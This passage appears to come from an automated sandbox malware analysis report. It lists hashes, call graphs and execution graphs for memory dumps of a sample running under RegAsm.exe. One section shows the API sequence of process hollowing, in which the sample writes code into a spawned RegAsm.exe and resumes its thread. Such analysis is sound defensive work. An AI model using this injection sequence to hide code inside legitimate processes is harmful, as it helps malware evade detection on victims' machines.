                                                                            • Instruction Fuzzy Hash: 4321C7303002432BE3066AAAA951E7DAB5EFF95A04B44493DD1098F699CF755C2E83D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D}i$D}i$D}i$D}i$D}i$D}i
                                                                            • API String ID: 0-3147682437
                                                                            • Opcode ID: 191b14e2d5623b2a6b7a31278a72b1b385937d3f22b085a30360b20320e0666c
                                                                            • Instruction ID: b4a8f0494ae2c4564190a03211ab720bdcac573010953c0661f3444c1f3bc373
                                                                            • Opcode Fuzzy Hash: 191b14e2d5623b2a6b7a31278a72b1b385937d3f22b085a30360b20320e0666c
                                                                            • Instruction Fuzzy Hash: 6D11C6303402432BE2066AAAA941E3DA65FFFD5704B408A3DD10D8F698CF766D5D83D7

                                                                            Execution Graph

                                                                            Execution Coverage:36.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:20
                                                                            Total number of Limit Nodes:0

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            callgraph 0 Function_013300B0 1 Function_01330530 56 Function_0133026C 1->56 2 Function_01331330 3 Function_013301B4 4 Function_01330234 5 Function_0133013C 6 Function_013300BC 7 Function_0133053C 7->56 8 Function_03002191 9 Function_013300A0 10 Function_013310A6 11 Function_01330524 12 Function_01330224 13 Function_013301A8 14 Function_0133012C 15 Function_013310AC 15->56 16 Function_01330090 17 Function_01331216 18 Function_01330214 19 Function_01330198 20 Function_01330498 21 Function_0133011C 22 Function_0133121C 22->56 23 Function_01330501 24 Function_01330100 25 Function_01330080 26 Function_01330988 26->1 26->7 26->11 31 Function_01331270 26->31 54 Function_01331268 26->54 65 Function_01330C58 26->65 72 Function_01330B40 26->72 80 Function_01330548 26->80 27 Function_01330188 28 Function_01330208 29 Function_0133010C 30 Function_01330471 32 Function_01330070 33 Function_013300F0 34 Function_01330475 35 Function_013310F4 35->56 36 Function_0133097A 36->1 36->7 36->11 36->31 36->54 36->65 36->72 36->80 37 Function_01330479 38 Function_013304F9 39 Function_01330178 40 Function_013301F8 41 Function_0133047D 42 Function_013304FD 43 Function_0133027C 44 Function_01330461 45 Function_01330561 46 Function_01330060 47 Function_01330260 48 Function_01330165 49 Function_013301E5 50 Function_01330465 51 Function_013300E4 52 Function_01330469 53 Function_013308E8 55 Function_0133046D 57 Function_01330450 58 Function_01330A57 58->1 58->7 58->31 58->54 58->65 58->72 58->80 59 Function_013301D5 60 Function_01330555 61 Function_01330154 62 Function_013300D4 63 Function_01330254 64 Function_01330559 66 Function_013308D8 67 Function_013304DF 68 Function_01330F5F 68->56 69 Function_0133045D 70 Function_0133055D 71 Function_013304C1 73 Function_013301C0 74 Function_013304C5 75 Function_01330244 76 Function_01330444 77 Function_013304C9 78 Function_01330148 79 Function_013300C8 81 Function_01330848 82 Function_01330BC8 83 Function_0133004D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03002103,030020F3), ref: 03002300
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03002313
                                                                            • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 03002331
                                                                            • ReadProcessMemory.KERNELBASE(00000098,?,03002147,00000004,00000000), ref: 03002355
                                                                            • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 03002380
                                                                            • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 030023D8
                                                                            • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 03002423
                                                                            • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 03002461
                                                                            • Wow64SetThreadContext.KERNEL32(0000009C,02EE0000), ref: 0300249D
                                                                            • ResumeThread.KERNELBASE(0000009C), ref: 030024AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2737920203.0000000003002000.00000040.00000800.00020000.00000000.sdmp, Offset: 03002000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_3002000_12dsvc.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                            • API String ID: 2687962208-1257834847
                                                                            • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                            • Instruction ID: 5454b5271a93410d72ddbc0acf8a1ff322dc2c4e20303337e2b5fed292934eab
                                                                            • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                            • Instruction Fuzzy Hash: 54B1F87664124AAFDB60CF68CC80BDA73A9FF88714F158564EA0CAB341D774FA418B94

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 23 1331268-13312fd VirtualProtectEx 26 1331304-1331325 23->26 27 13312ff 23->27 27->26
                                                                            APIs
                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 013312F0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2737362819.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_1330000_12dsvc.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 5b471897516ef3ed9f03d7b11100fd27118030523d60a3cca2b12689e62b60b4
                                                                            • Instruction ID: 7fb4a6beb6ed62cbdd4a06f7dd573151c8b178293b1b3d2830f56b817f846ff4
                                                                            • Opcode Fuzzy Hash: 5b471897516ef3ed9f03d7b11100fd27118030523d60a3cca2b12689e62b60b4
                                                                            • Instruction Fuzzy Hash: 8121F3B1C002599FCB10DFAAC884AEEBFF4FF48310F10852AE919A7250C7799944CFA1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 30 1331270-13312fd VirtualProtectEx 33 1331304-1331325 30->33 34 13312ff 30->34 34->33
                                                                            APIs
                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 013312F0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2737362819.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_1330000_12dsvc.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 0b6b5bdc11b9b002d89adb27c5abe627156a220a557c0482b269ab06cd0c1d9a
                                                                            • Instruction ID: 952e461ffee1aff68af17982f0a06114e805bd29d81a595b635d52f032f36cc7
                                                                            • Opcode Fuzzy Hash: 0b6b5bdc11b9b002d89adb27c5abe627156a220a557c0482b269ab06cd0c1d9a
                                                                            • Instruction Fuzzy Hash: 802115B18002499FCB10DF9AC880ADEFBF4FF48310F108419E919A7250C774A944CFA1

                                                                            Execution Graph

                                                                            Execution Coverage:5.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0.9%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:48
                                                                            execution_graph 21548 414b46 21549 414b52 ___scrt_is_nonwritable_in_current_image 21548->21549 21560 40e0c6 EnterCriticalSection 21549->21560 21551 414b59 21561 41c915 21551->21561 21559 414b77 21585 414b9d 21559->21585 21560->21551 21562 41c921 ___scrt_is_nonwritable_in_current_image 21561->21562 21563 41c94b 21562->21563 21564 41c92a 21562->21564 21588 40e0c6 EnterCriticalSection 21563->21588 21565 40e072 __dosmaperr 14 API calls 21564->21565 21567 41c92f 21565->21567 21568 40df74 _Ungetc 41 API calls 21567->21568 21569 414b68 21568->21569 21569->21559 21574 4149e0 GetStartupInfoW 21569->21574 21570 41c983 21589 41c9aa 21570->21589 21572 41c957 21572->21570 21573 41c865 __wsopen_s 15 API calls 21572->21573 21573->21572 21575 4149fd 21574->21575 21577 414a91 21574->21577 21576 41c915 42 API calls 21575->21576 21575->21577 21578 414a25 21576->21578 21580 414a96 21577->21580 21578->21577 21579 414a55 GetFileType 21578->21579 21579->21578 21581 414a9d 21580->21581 21582 414ae0 GetStdHandle 21581->21582 21583 414b42 21581->21583 21584 414af3 GetFileType 21581->21584 21582->21581 21583->21559 21584->21581 21593 40e10e LeaveCriticalSection 21585->21593 21587 414b88 21588->21572 21592 40e10e LeaveCriticalSection 21589->21592 21591 41c9b1 21591->21569 21592->21591 21593->21587 20069 40104e 20074 405abe 20069->20074 20071 401061 20078 4076cb 20071->20078 20075 405aca __EH_prolog3 20074->20075 20081 40641a 20075->20081 20077 405b26 std::ios_base::_Init 20077->20071 20145 40769e 20078->20145 20090 406039 20081->20090 20083 406425 20098 4049a0 20083->20098 20086 406452 20087 40645e 20086->20087 20102 406fef 20086->20102 20087->20077 20088 401f00 std::ios_base::_Init 43 API calls 20088->20086 20091 406045 __EH_prolog3 20090->20091 20092 401f00 std::ios_base::_Init 43 API calls 20091->20092 20093 406076 20092->20093 20094 40742e std::ios_base::_Init 16 API calls 20093->20094 20095 40607d 20094->20095 20097 40608e std::ios_base::_Init 20095->20097 20107 4057aa 20095->20107 20097->20083 20099 4049b3 20098->20099 20100 404b20 72 API calls 20099->20100 20101 4049bd 20100->20101 20101->20086 20101->20088 20103 405474 std::_Lockit::_Lockit 7 API calls 20102->20103 20104 406fff 20103->20104 20105 4054cc std::_Lockit::~_Lockit 2 API calls 20104->20105 20106 40703d 20105->20106 20106->20087 20108 4057b6 __EH_prolog3 20107->20108 20109 405474 std::_Lockit::_Lockit 7 API calls 20108->20109 20110 4057c1 20109->20110 20114 4057f2 20110->20114 20119 40590f 20110->20119 20112 4054cc std::_Lockit::~_Lockit 2 API calls 20115 405832 std::ios_base::_Init 20112->20115 20113 4057d4 20125 405932 20113->20125 20114->20112 20115->20097 20118 405702 _Yarn 15 API calls 20118->20114 20120 40742e std::ios_base::_Init 16 API calls 20119->20120 20121 40591a 20120->20121 20122 40592e 20121->20122 20129 40563e 20121->20129 20122->20113 20126 40593e 20125->20126 20128 4057dc 20125->20128 20132 406fc0 20126->20132 20128->20118 20130 405702 _Yarn 15 API calls 20129->20130 20131 405678 20130->20131 20131->20113 20133 406fd0 EncodePointer 20132->20133 20134 40e13c 20132->20134 20133->20128 20133->20134 20135 4174ae _unexpected 2 API calls 20134->20135 20136 40e141 20135->20136 20137 40e14c 20136->20137 20138 4174f3 _unexpected 41 API calls 20136->20138 20139 40e156 IsProcessorFeaturePresent 20137->20139 20144 40e175 20137->20144 20138->20137 20141 40e162 20139->20141 20140 411577 _unexpected 23 API calls 20142 40e17f 20140->20142 20143 40dd78 _unexpected 8 API calls 20141->20143 20143->20144 20144->20140 20146 4076b4 20145->20146 20147 4076ad 20145->20147 20154 413230 20146->20154 20151 4131b3 20147->20151 20150 40106b 20152 413230 44 API calls 20151->20152 20153 4131c5 20152->20153 20153->20150 20157 412f7c 20154->20157 20158 412f88 ___scrt_is_nonwritable_in_current_image 20157->20158 20165 40e0c6 EnterCriticalSection 20158->20165 20160 412f96 20166 412fd7 20160->20166 20162 412fa3 20176 412fcb 20162->20176 20165->20160 20167 412ff2 20166->20167 20175 413065 __dosmaperr 20166->20175 20174 413045 20167->20174 20167->20175 20179 41ef6b 20167->20179 20169 41ef6b 44 API calls 20171 41305b 20169->20171 20170 41303b 20172 4140f1 ___free_lconv_mon 14 API calls 20170->20172 20173 4140f1 ___free_lconv_mon 14 API calls 20171->20173 20172->20174 20173->20175 20174->20169 20174->20175 20175->20162 20207 40e10e LeaveCriticalSection 20176->20207 20178 412fb4 20178->20150 20180 41ef93 20179->20180 20181 41ef78 20179->20181 20183 41efa2 20180->20183 20188 4239f1 20180->20188 20181->20180 20182 41ef84 20181->20182 20184 40e072 __dosmaperr 14 API calls 20182->20184 20195 419c05 20183->20195 20187 41ef89 codecvt 20184->20187 20187->20170 20189 423a11 HeapSize 20188->20189 20190 4239fc 20188->20190 20189->20183 20191 40e072 __dosmaperr 14 API calls 20190->20191 20192 423a01 20191->20192 20193 40df74 _Ungetc 41 API calls 20192->20193 20194 423a0c 20193->20194 20194->20183 20196 419c12 20195->20196 20197 419c1d 20195->20197 20199 415426 std::_Locinfo::_Locinfo_dtor 15 API calls 20196->20199 20198 419c25 20197->20198 20206 419c2e __dosmaperr 20197->20206 20200 4140f1 ___free_lconv_mon 14 API calls 20198->20200 20203 419c1a 20199->20203 20200->20203 20201 419c33 20204 40e072 __dosmaperr 14 API calls 20201->20204 20202 419c58 HeapReAlloc 20202->20203 20202->20206 20203->20187 20204->20203 20205 412e98 std::ios_base::_Init 2 API calls 20205->20206 20206->20201 20206->20202 20206->20205 20207->20178 20289 406464 20292 406489 20289->20292 20294 406485 20289->20294 20290 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20291 4064f1 20290->20291 20292->20294 20295 40653f 20292->20295 20296 4064cd 20292->20296 20294->20290 20295->20294 20297 40dcfa 69 API calls 20295->20297 20296->20294 20298 4059eb 20296->20298 20297->20294 20301 40e7fb 20298->20301 20302 40e80e _Fputc 20301->20302 20307 40e5ff 20302->20307 20305 40bbd5 _Fputc 41 API calls 20306 4059f9 20305->20306 20306->20294 20308 40e60b ___scrt_is_nonwritable_in_current_image 20307->20308 20309 40e612 20308->20309 20310 40e637 20308->20310 20311 40def7 _Fputc 41 API calls 20309->20311 20318 40bb65 EnterCriticalSection 20310->20318 20313 40e62d 20311->20313 20313->20305 20314 40e646 20319 40e6c3 20314->20319 20318->20314 20320 40e6e8 _Fputc 20319->20320 20321 40e6fa 20319->20321 20324 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20320->20324 20322 414bd2 _Ungetc 41 API calls 20321->20322 20323 40e701 20322->20323 20325 40e729 20323->20325 20326 414bd2 _Ungetc 41 API calls 20323->20326 20327 40e657 20324->20327 20325->20320 20329 414bd2 _Ungetc 41 API calls 20325->20329 20328 40e712 20326->20328 20341 40e687 20327->20341 20328->20325 20330 414bd2 _Ungetc 41 API calls 20328->20330 20332 40e75c 20329->20332 20331 40e71e 20330->20331 20333 414bd2 _Ungetc 41 API calls 20331->20333 20334 40e77f 20332->20334 20335 414bd2 _Ungetc 41 API calls 20332->20335 20333->20325 20334->20320 20336 41607a _Fputc 43 API calls 20334->20336 20337 40e768 20335->20337 20336->20320 20337->20334 20338 414bd2 _Ungetc 41 API calls 20337->20338 20339 40e774 20338->20339 20340 414bd2 _Ungetc 41 API calls 20339->20340 20340->20334 20344 40bb79 LeaveCriticalSection 20341->20344 20343 40e68d 20343->20313 20344->20343 21872 40657c 21873 406597 21872->21873 21875 4065a9 21873->21875 21876 405a08 21873->21876 21879 40ea6d 21876->21879 21880 40ea79 ___scrt_is_nonwritable_in_current_image 21879->21880 21881 40ea80 21880->21881 21882 40ea97 21880->21882 21884 40e072 __dosmaperr 14 API calls 21881->21884 21892 40bb65 EnterCriticalSection 21882->21892 21886 40ea85 21884->21886 21885 40eaa6 21893 40e9b7 21885->21893 21888 40df74 _Ungetc 41 API calls 21886->21888 21889 405a1a 21888->21889 21889->21875 21890 40eab4 21907 40eae3 21890->21907 21892->21885 21894 40e9cd 21893->21894 21896 40ea57 _Ungetc 21893->21896 21895 40e9fb 21894->21895 21894->21896 21897 418105 _Ungetc 14 API calls 21894->21897 21895->21896 21898 414bd2 _Ungetc 41 API calls 21895->21898 21896->21890 21897->21895 21899 40ea0d 21898->21899 21900 414bd2 _Ungetc 41 API calls 21899->21900 21901 40ea30 21899->21901 21903 40ea19 21900->21903 21901->21896 21910 40e8aa 21901->21910 21903->21901 21904 414bd2 _Ungetc 41 API calls 21903->21904 21905 40ea25 21904->21905 21906 414bd2 _Ungetc 41 API calls 21905->21906 21906->21901 21929 40bb79 LeaveCriticalSection 21907->21929 21909 40eae9 21909->21889 21911 414bd2 _Ungetc 41 API calls 21910->21911 21912 40e8cd 21911->21912 21913 40e8f6 21912->21913 21914 414bd2 _Ungetc 41 API calls 21912->21914 21919 40e930 21913->21919 21923 4161e4 21913->21923 21915 40e8db 21914->21915 21915->21913 21917 414bd2 _Ungetc 41 API calls 21915->21917 21918 40e8e9 21917->21918 21920 414bd2 _Ungetc 41 API calls 21918->21920 21921 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 21919->21921 21920->21913 21922 40e9ae 21921->21922 21922->21896 21924 4161f7 _Fputc 21923->21924 21925 41607a _Fputc 43 API calls 21924->21925 21926 41620c 21925->21926 21927 40bbd5 _Fputc 41 API calls 21926->21927 21928 416219 21927->21928 21928->21919 21929->21909 20470 415002 20471 41500d 20470->20471 20475 41501d 20470->20475 20476 415023 20471->20476 20474 4140f1 ___free_lconv_mon 14 API calls 20474->20475 20477 41503e 20476->20477 20478 415038 20476->20478 20480 4140f1 ___free_lconv_mon 14 API calls 20477->20480 20479 4140f1 ___free_lconv_mon 14 API calls 20478->20479 20479->20477 20481 41504a 20480->20481 20482 4140f1 ___free_lconv_mon 14 API calls 20481->20482 20483 415055 20482->20483 20484 4140f1 ___free_lconv_mon 14 API calls 20483->20484 20485 415060 20484->20485 20486 4140f1 ___free_lconv_mon 14 API calls 20485->20486 20487 41506b 20486->20487 20488 4140f1 ___free_lconv_mon 14 API calls 20487->20488 20489 415076 20488->20489 20490 4140f1 ___free_lconv_mon 14 API calls 20489->20490 20491 415081 20490->20491 20492 4140f1 ___free_lconv_mon 14 API calls 20491->20492 20493 41508c 20492->20493 20494 4140f1 ___free_lconv_mon 14 API calls 20493->20494 20495 415097 20494->20495 20496 4140f1 ___free_lconv_mon 14 API calls 20495->20496 20497 4150a5 20496->20497 20502 414e4f 20497->20502 20503 414e5b ___scrt_is_nonwritable_in_current_image 20502->20503 20518 40e0c6 EnterCriticalSection 20503->20518 20505 414e65 20508 4140f1 ___free_lconv_mon 14 API calls 20505->20508 20509 414e8f 20505->20509 20508->20509 20519 414eae 20509->20519 20510 414eba 20511 414ec6 ___scrt_is_nonwritable_in_current_image 20510->20511 20523 40e0c6 EnterCriticalSection 20511->20523 20513 414ed0 20514 4150f0 __dosmaperr 14 API calls 20513->20514 20515 414ee3 20514->20515 20524 414f03 20515->20524 20518->20505 20522 40e10e LeaveCriticalSection 20519->20522 20521 414e9c 20521->20510 20522->20521 20523->20513 20527 40e10e LeaveCriticalSection 20524->20527 20526 414ef1 20526->20474 20527->20526 20563 40660e 20564 406622 20563->20564 20570 40667d 20564->20570 20571 405e65 20564->20571 20567 40666a 20567->20570 20583 40efa7 20567->20583 20572 405e80 20571->20572 20575 405ed1 20571->20575 20572->20575 20576 40dcfa 69 API calls 20572->20576 20573 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20574 405ee9 20573->20574 20574->20567 20574->20570 20577 40f318 20574->20577 20575->20573 20576->20575 20578 40f32b _Fputc 20577->20578 20597 40f0b7 20578->20597 20581 40bbd5 _Fputc 41 API calls 20582 40f34d 20581->20582 20582->20567 20584 40efb2 20583->20584 20585 40efc7 20583->20585 20586 40e072 __dosmaperr 14 API calls 20584->20586 20587 40efe4 20585->20587 20588 40efcf 20585->20588 20589 40efb7 20586->20589 20626 41886b 20587->20626 20590 40e072 __dosmaperr 14 API calls 20588->20590 20592 40df74 _Ungetc 41 API calls 20589->20592 20593 40efd4 20590->20593 20595 40efc2 20592->20595 20596 40df74 _Ungetc 41 API calls 20593->20596 20594 40efdf 20594->20570 20595->20570 20596->20594 20598 40f0c3 ___scrt_is_nonwritable_in_current_image 20597->20598 20599 40f0c9 20598->20599 20601 40f0fd 20598->20601 20600 40def7 _Fputc 41 API calls 20599->20600 20603 40f0e4 20600->20603 20608 40bb65 EnterCriticalSection 20601->20608 20603->20581 20604 40f109 20609 40f22c 20604->20609 20606 40f120 20618 40f149 20606->20618 20608->20604 20610 40f252 20609->20610 20611 40f23f 20609->20611 20621 40f153 20610->20621 20611->20606 20613 40f275 20614 40ed28 ___scrt_uninitialize_crt 66 API calls 20613->20614 20617 40f303 20613->20617 20615 40f2a3 20614->20615 20616 418af3 __wsopen_s 43 API calls 20615->20616 20616->20617 20617->20606 20625 40bb79 LeaveCriticalSection 20618->20625 20620 40f151 20620->20603 20622 40f164 20621->20622 20623 40f1bc 20621->20623 20622->20623 20624 418ab3 __wsopen_s 43 API calls 20622->20624 20623->20613 20624->20623 20625->20620 20627 41887f _Fputc 20626->20627 20632 418280 20627->20632 20630 40bbd5 _Fputc 41 API calls 20631 418899 20630->20631 20631->20594 20633 41828c ___scrt_is_nonwritable_in_current_image 20632->20633 20634 418293 20633->20634 20635 4182b6 20633->20635 20636 40def7 _Fputc 41 API calls 20634->20636 20643 40bb65 EnterCriticalSection 20635->20643 20638 4182ac 20636->20638 20638->20630 20639 4182c4 20644 41830f 20639->20644 20641 4182d3 20657 418305 20641->20657 20643->20639 20645 418346 20644->20645 20646 41831e 20644->20646 20648 414bd2 _Ungetc 41 API calls 20645->20648 20647 40def7 _Fputc 41 API calls 20646->20647 20656 418339 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20647->20656 20649 41834f 20648->20649 20660 418a95 20649->20660 20652 4183f9 20663 41866f 20652->20663 20654 418410 20654->20656 20675 4184b0 20654->20675 20656->20641 20698 40bb79 LeaveCriticalSection 20657->20698 20659 41830d 20659->20638 20682 4188ac 20660->20682 20664 41867e __wsopen_s 20663->20664 20665 414bd2 _Ungetc 41 API calls 20664->20665 20667 41869a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20665->20667 20666 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20668 418818 20666->20668 20669 418a95 45 API calls 20667->20669 20674 4186a6 20667->20674 20668->20656 20670 4186fa 20669->20670 20671 41872c ReadFile 20670->20671 20670->20674 20672 418753 20671->20672 20671->20674 20673 418a95 45 API calls 20672->20673 20673->20674 20674->20666 20676 414bd2 _Ungetc 41 API calls 20675->20676 20677 4184c3 20676->20677 20678 418a95 45 API calls 20677->20678 20681 41850b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20677->20681 20679 41855e 20678->20679 20680 418a95 45 API calls 20679->20680 20679->20681 20680->20681 20681->20656 20684 4188b8 ___scrt_is_nonwritable_in_current_image 20682->20684 20683 41836d 20683->20652 20683->20654 20683->20656 20684->20683 20685 418996 20684->20685 20687 418914 20684->20687 20686 40def7 _Fputc 41 API calls 20685->20686 20686->20683 20693 41c9b3 EnterCriticalSection 20687->20693 20689 41891a 20690 41893f 20689->20690 20691 4189d2 __wsopen_s 43 API calls 20689->20691 20694 41898e 20690->20694 20691->20690 20693->20689 20697 41ca68 LeaveCriticalSection 20694->20697 20696 418994 20696->20683 20697->20696 20698->20659 22129 40bb19 22130 40edf6 ___scrt_uninitialize_crt 70 API calls 22129->22130 22131 40bb21 22130->22131 22139 4148f5 22131->22139 22133 40bb26 22134 4149a0 14 API calls 22133->22134 22135 40bb35 DeleteCriticalSection 22134->22135 22135->22133 22136 40bb50 22135->22136 22137 4140f1 ___free_lconv_mon 14 API calls 22136->22137 22138 40bb5b 22137->22138 22140 414901 ___scrt_is_nonwritable_in_current_image 22139->22140 22149 40e0c6 EnterCriticalSection 22140->22149 22142 414978 22150 414997 22142->22150 22144 41490c 22144->22142 22146 41494c DeleteCriticalSection 22144->22146 22148 40bd99 71 API calls 22144->22148 22147 4140f1 ___free_lconv_mon 14 API calls 22146->22147 22147->22144 22148->22144 22149->22144 22153 40e10e LeaveCriticalSection 22150->22153 22152 414984 22152->22133 22153->22152 22167 417f20 22168 417f44 22167->22168 22169 417f2f 22167->22169 22173 417fa2 22168->22173 22174 418105 _Ungetc 14 API calls 22168->22174 22181 417f3f 22168->22181 22170 40e072 __dosmaperr 14 API calls 22169->22170 22171 417f34 22170->22171 22172 40df74 _Ungetc 41 API calls 22171->22172 22172->22181 22175 414bd2 _Ungetc 41 API calls 22173->22175 22174->22173 22176 417fd2 22175->22176 22187 42211e 22176->22187 22179 414bd2 _Ungetc 41 API calls 22180 418014 22179->22180 22180->22181 22182 414bd2 _Ungetc 41 API calls 22180->22182 22183 418022 22182->22183 22183->22181 22184 414bd2 _Ungetc 41 API calls 22183->22184 22185 418030 22184->22185 22186 414bd2 _Ungetc 41 API calls 22185->22186 22186->22181 22188 42212a ___scrt_is_nonwritable_in_current_image 22187->22188 22189 422132 22188->22189 22190 42214a 22188->22190 22192 40e05f __dosmaperr 14 API calls 22189->22192 22191 422207 22190->22191 22195 422180 22190->22195 22193 40e05f __dosmaperr 14 API calls 22191->22193 22194 422137 22192->22194 22196 42220c 22193->22196 22197 40e072 __dosmaperr 14 API calls 22194->22197 22198 422189 22195->22198 22199 42219e 22195->22199 22200 40e072 __dosmaperr 14 API calls 22196->22200 22216 417fda 22197->22216 22201 40e05f __dosmaperr 14 API calls 22198->22201 22217 41c9b3 EnterCriticalSection 22199->22217 22203 422196 22200->22203 22204 42218e 22201->22204 22209 40df74 _Ungetc 41 API calls 22203->22209 22206 40e072 __dosmaperr 14 API calls 22204->22206 22205 4221a4 22207 4221c0 22205->22207 22208 4221d5 22205->22208 22206->22203 22211 40e072 __dosmaperr 14 API calls 22207->22211 22210 422232 __wsopen_s 53 API calls 22208->22210 22209->22216 22212 4221d0 22210->22212 22213 4221c5 22211->22213 22218 4221ff 22212->22218 22214 40e05f __dosmaperr 14 API calls 22213->22214 22214->22212 22216->22179 22216->22181 22217->22205 22221 41ca68 LeaveCriticalSection 22218->22221 22220 422205 22220->22216 22221->22220 20831 40683d 20832 406849 __EH_prolog3_GS 20831->20832 20834 406898 20832->20834 20838 406860 20832->20838 20842 4068b2 20832->20842 20845 4059c4 20834->20845 20878 4076f4 20838->20878 20841 406961 20873 403f30 20841->20873 20842->20841 20844 40699c 20842->20844 20848 403f80 20842->20848 20853 40ee9b 20842->20853 20844->20841 20881 40f649 20844->20881 20894 40e588 20845->20894 20849 403fa7 20848->20849 20850 403f89 20848->20850 20851 404420 43 API calls 20849->20851 20850->20842 20852 403fbb 20851->20852 20852->20842 20854 40eea7 ___scrt_is_nonwritable_in_current_image 20853->20854 20855 40eeb1 20854->20855 20856 40eec9 20854->20856 20857 40e072 __dosmaperr 14 API calls 20855->20857 20978 40bb65 EnterCriticalSection 20856->20978 20859 40eeb6 20857->20859 20861 40df74 _Ungetc 41 API calls 20859->20861 20860 40eed3 20862 40ef6f 20860->20862 20864 414bd2 _Ungetc 41 API calls 20860->20864 20867 40eec1 20861->20867 20979 40ee54 20862->20979 20869 40eef0 20864->20869 20865 40ef75 20986 40ef9f 20865->20986 20867->20842 20868 40ef47 20870 40e072 __dosmaperr 14 API calls 20868->20870 20869->20862 20869->20868 20871 40ef4c 20870->20871 20872 40df74 _Ungetc 41 API calls 20871->20872 20872->20867 20874 403f3b 20873->20874 20875 403f56 error_info_injector 20873->20875 20874->20875 20876 40df84 std::ios_base::_Init 41 API calls 20874->20876 20875->20838 20877 403f7a 20876->20877 20879 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20878->20879 20880 4076fe 20879->20880 20880->20880 20882 40f655 ___scrt_is_nonwritable_in_current_image 20881->20882 20883 40f671 20882->20883 20884 40f65c 20882->20884 20990 40bb65 EnterCriticalSection 20883->20990 20885 40e072 __dosmaperr 14 API calls 20884->20885 20887 40f661 20885->20887 20889 40df74 _Ungetc 41 API calls 20887->20889 20888 40f67b 20991 40f550 20888->20991 20891 40f66c 20889->20891 20891->20844 20895 40e594 ___scrt_is_nonwritable_in_current_image 20894->20895 20896 40e5b2 20895->20896 20897 40e59b 20895->20897 20907 40bb65 EnterCriticalSection 20896->20907 20899 40e072 __dosmaperr 14 API calls 20897->20899 20901 40e5a0 20899->20901 20900 40e5be 20908 40e418 20900->20908 20903 40df74 _Ungetc 41 API calls 20901->20903 20905 4059cf 20903->20905 20904 40e5c9 20942 40e5f7 20904->20942 20905->20838 20907->20900 20909 40e435 20908->20909 20910 40e49b 20908->20910 20911 414bd2 _Ungetc 41 API calls 20909->20911 20912 414bd2 _Ungetc 41 API calls 20910->20912 20941 40e492 20910->20941 20913 40e43b 20911->20913 20915 40e4b0 20912->20915 20914 414bd2 _Ungetc 41 API calls 20913->20914 20916 40e45e 20913->20916 20917 40e447 20914->20917 20918 414bd2 _Ungetc 41 API calls 20915->20918 20919 40e4d3 20915->20919 20916->20910 20927 40e479 20916->20927 20917->20916 20922 414bd2 _Ungetc 41 API calls 20917->20922 20920 40e4bc 20918->20920 20921 40ee90 41 API calls 20919->20921 20919->20941 20920->20919 20926 414bd2 _Ungetc 41 API calls 20920->20926 20924 40e4f3 20921->20924 20925 40e453 20922->20925 20928 40f704 __Getctype 41 API calls 20924->20928 20924->20941 20929 414bd2 _Ungetc 41 